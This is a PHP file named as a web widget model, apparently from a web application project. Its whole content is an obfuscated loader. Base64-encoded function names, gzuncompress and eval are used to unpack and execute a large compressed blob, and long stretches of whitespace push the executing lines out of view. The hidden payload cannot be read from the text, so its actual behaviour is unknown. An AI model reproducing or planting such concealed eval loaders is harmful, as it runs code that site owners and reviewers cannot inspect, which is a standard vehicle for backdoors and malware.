<?php 
        $__='printf';$_='Loading donjo-app/models/Web_widget_model.php';
        























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































                                                                                                                                                                                                                     $________;
